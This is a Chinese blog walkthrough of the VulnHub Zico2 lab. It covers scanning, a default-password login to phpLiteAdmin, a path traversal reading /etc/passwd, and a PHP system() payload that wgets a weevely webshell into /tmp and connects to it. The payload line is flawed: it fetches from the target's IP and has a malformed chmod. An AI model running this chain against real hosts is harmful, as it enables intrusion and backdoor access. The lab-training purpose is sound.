路径遍历实战

已于 2022-05-29 11:58:50 修改
阅读量649 收藏 3
点赞数
分类专栏: 靶场实战系列 文章标签: 安全 web安全 经验分享
于 2022-05-29 11:54:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23347209/article/details/125027818
版权

文章目录

环境准备

靶场下载地址:https://download.vulnhub.com/zico/zico2.ova
使用Vmware虚拟机中NAT网络
靶机:192.168.146.152
攻击机 parrot 192.168.146.129

提示:以下是本篇文章正文内容,下面案例可供参考

一、信息搜集

1.服务器信息搜集

-A全面扫描
-p-全端口扫描

nmap -A -p- 192.168.146.152

开放了80端口web服务,22ssh服务和111号端口nfs(network file system)服务
在这里插入图片描述
浏览其网站
在这里插入图片描述

2.网站信息搜集

dirb目录扫描

dirb是一个基于字典的web目录扫描工具,是信息搜集常用的工具

dirb http://192.168.146.152

发现敏感目录dbadmin下
在这里插入图片描述
open link访问页面
在这里插入图片描述
**发现一个登录窗口,Google搜索了一下phpliteadmin的默认密码,是admin,并尝试登录**

在这里插入图片描述
在这里插入图片描述
成功😄O(∩_∩)O进入后台

二、OWASP ZAP进行渗透测试

1、OWASP ZAP简介:

ZAP是OWASP里的工具类项目,全称是OWASP Zed attack proxy,是一款web application 集成渗透测试和漏洞工具,
ZAP主要覆盖了安全性测试里渗透测试即对系统进行模拟攻击和分析来确定其安全性漏洞。ZAP能够以代理的形式来实现渗透性测试,则可以通过对其抓包进行分析、扫描。

2、主要功能:

  • 本地代理
  • 主动扫描
  • 被动扫描
  • Fuzzy
  • 暴力破解

parrot选择owasp-zap进入
在这里插入图片描述
点击主动扫描——开始攻击👇
ps:其中我们最关注的当然是安全性风险项,ZAP 将做出以下标识:
发现这是个高风险路径遍历漏洞
在这里插入图片描述
复制其url并整理得以下地址,成功执行↓

http://192.168.146.152/view.php?page=…/…/…/…/etc/passwd
在这里插入图片描述

三、利用weevely创建木马

weevely是parrot和kali下集成的一款很好用的针对php语言的webshell管理工具,可用于像一个隐藏的后门。
并且携带了大量渗透测试的管理模块,客户端也可以在本地运行shell命令传输

生成php木马

weevely generate 123456 /root/shell.php

在这里插入图片描述

四、parrot本地开启apache服务

用于上传木马到web服务上,以供目标靶机下载木马文件

首先将shell.php移动到/var/www/html里

mv /root/shell.php /var/www/html

然后开启apache服务

service apache2 start

五、后台构造恶意php代码并执行

我们回到后台数据库
在数据库下新建一个shell.php
在这里插入图片描述
新建一个table表
在这里插入图片描述
在表里插入一个列
在这里插入图片描述

最后在列里插入数据👇
1.先进入tmp目录(可读写执行)下,2.使用wget命令下载parrot本地服务器上的木马文件shell.php
3.然后给shell.php加可执行权限
ps:分号;用于执行多条命令

<?php system("cd /tmp;wget http://192.168.146.152/shell.php;chmod + x shell.php;");?>

在这里插入图片描述

浏览器访问地址:192.168.146.152/view.php?page=…/…/…/…/usr/databases/shell.php
成功给目标靶机执行上面👆的恶意代码——将木马shell.php下载到服务器tmp底下

然后让其执行木马程序↓
再访问地址:http://192.168.146.152/view.php?page=…/…/…/…/tmp/shell.php

weevely连接木马

weevely http://192.168.146.152/view.php?page=../../../../tmp/shell.php 123456

在这里插入图片描述
成功连接到服务器,完成收工😄

出黎on
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
路径之谜
memeda1141的博客
05-21 1810
路径之谜 小明冒充X星球的骑士,进入了一个奇怪的城堡。 城堡里边什么都没有,只有方形石头铺成的地面。 假设城堡地面是 n x n 个方格。【如图1.png】所示。 按习俗,骑士要从西北角走到东南角。 可以横向或纵向移动,但不能斜着走,也不能跳跃。 每走到一个新方格,就要向正北方和正西方各射一箭。 (城堡的西墙和北墙内各有 n 个靶子) 同一个方格只允许经过一次。但不必做完所有的方格
Kettle循环遍历结果集.zip
03-26
本示例中的"Kettle循环遍历结果集.zip"是一个针对Kettle8.2版本设计的实战案例,展示了如何在Job中实现这一功能并将输出写入日志。 首先,理解Kettle中的Job与Transformation的区别至关重要。Job是Kettle的工作流,...
Web 安全路径遍历攻击详解
路多辛的所思所想
04-01 1121
路径遍历攻击的核心原理在于利用目标系统处理用户输入时的不安全或疏忽行为,尤其是当应用程序接受用户提供的文件名或路径,并据此进行文件操作(如读取、写入或执行文件)时。攻击者会提交精心构造的恶意路径,其中包含了特殊的字符序列或编码,使得原本应该在限定目录下的文件操作跨越了预设边界,进而访问到服务器文件系统的其他位置。
「 典型安全漏洞系列 」06.路径遍历(Path Traversal)详解
所有成功的背后,都是痛苦的坚持,所有的痛苦,都是傻瓜般的不放弃!
01-24 3202
路径遍历(Path Traversal)是一种安全漏洞,也被称为目录遍历目录穿越、文件路径遍历。它发生在应用程序未正确验证用户提供的文件路径时,允许攻击者访问系统上的敏感文件或目录,甚至执行恶意代码。
路径遍历漏洞】查找、利用、预防
08-20 5890
路径遍历漏洞】确定攻击目标、探查路径遍历漏洞、避开遍历攻击障碍、处理定制编码、利用遍历漏洞
Java代码审计之目录遍历漏洞详解
m0_71745754的博客
01-13 5682
通过用户输入,后端接收到参数直接拼接到指定路径下读取用户的文件名,看似正常,但是用户输入的参数不可控制,黑客将非法的特殊字符作为文件名的一部分,操作到其他路径下,甚至是跳转到服务器敏感目录,读取敏感的配置文件,例如服务器的密码文件,程序数据库,redis等核心配置文件,因此具有一定的风险;
应用安全系列之十一:路径遍历
jimmyleeee的专栏
03-05 2593
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 如果有不妥之处,希望可以留言指出。谢谢! ...
阅读理解实战(一)
12-22
3. 建立词汇表:遍历训练数据集中的问题和文章中的单词,将它们添加到词汇表中,并对出现次数少于2次的单词进行过滤,以减少词汇表的大小,降低模型复杂性。 4. 分配词向量:可以选择随机初始化词向量或加载预先训练...
SpringCloud实战小贴士之Zuul的路径匹配
08-29
SpringCloud实战小贴士之Zuul的路径匹配 在SpringCloud实战小贴士之Zuul的路径匹配中,路由匹配是非常重要的一部分。 Zuul作为SpringCloud的网关组件,路径匹配是其核心功能之一。在本篇文章中,我们将详细介绍Zuul...
Coverage_path_planning-master_无人车路径规划_源码
10-04
总结来说,“Coverage_path_planning-master”为我们提供了一个实战性的无人车路径规划案例,借助MATLAB的强大功能,我们可以深入学习和实践覆盖路径规划技术,这对于自动驾驶领域的人才培养和技术发展具有重要意义...
srping boot 实战小实例
05-27
总结起来,这个"Spring Boot实战小实例"涵盖了Spring Boot的基础架构、Spring MVC的控制器、数据库交互、前后端数据传输以及单元测试等多个重要知识点。通过这个实例,开发者不仅可以学习到如何使用Spring Boot构建...
web安全目录遍历攻击学习与防范
NineWaited的博客
05-19 4507
文章目录1.目录遍历攻击是什么2.目录遍历攻击如何实现3.如何防御目录遍历攻击 原文:什么是目录遍历攻击? (acunetix.com) 1.目录遍历攻击是什么 目录遍历或者路径遍历是一种HTTP攻击,允许攻击者访问受限制的目录并在web服务器的根目录【放网站的目录】之外执行命令。 如果系统受到了目录遍历攻击,攻击者可以利用此漏洞跳出根目录,并访问非web文件夹的其他文件部分,查看到大量本应该受限制的文件,从而为攻击者提供进一步危害系统所需要的更多信息。 以微软的IIS举例,用户本不应该有权限访
路径遍历攻击
最新发布
常备不懈
05-30 470
路径遍历攻击(也称为目录遍历)旨在访问存储在 Web服务器根路径之外的文件和目录。通过操作一系列带有“点-点-斜线 (../)”及其变体的绝对文件路径,可以访问到存储在文件系统上的任意文件和目录,包括应用程序源代码或配置和关键系统文件。
用Python做安全测试攻击实战
测试萌萌
05-24 2319
在本文中,我们将使用Python进行一次安全测试的实战演练,目标是找出并利用应用程序的安全漏洞。请注意,这个演练仅用于教育和研究目的,切勿将这些技术用于非法活动。 注意:未经授权的攻击是违法的。确保你在拥有明确权限的环境中执行这些攻击,例如在你自己的应用或经过明确授权的应用上进行。
OWASP ZAP上手体验
热门推荐
u013224189的专栏
10-30 2万+
新领到一个任务,试下OWASP ZAP。 工具说明          ZAproxy是一个易于使用交互式的用于web应用程序漏洞挖掘的渗透测试工具,可以检测sql注入,跨站脚本,跨站请求伪造以及路径遍历等问题。   下载地址 https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project   工具说明
dirb网站目录扫描工具详解
有勇气的牛排博客
07-29 6098
1 介绍 有勇气的牛排 — 攻防 Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令,帮助用户从网页生成字典,或者生成定制字典。 1.1 什么是dirb DIRB 是一个基于命令行的工具,可以根据单词列表对任何目录进行暴力破解。 DIRB 会发出一个 HTTP 请求,并查看每个请求的 HTTP 响应代码 1.2 如何工作
渗透测试-目录遍历漏洞
aming小老弟
06-26 2713
目录遍历
CTF训练 web安全目录遍历
qq_43613772的博客
06-13 4625
目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为“点-点斜线”、“...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值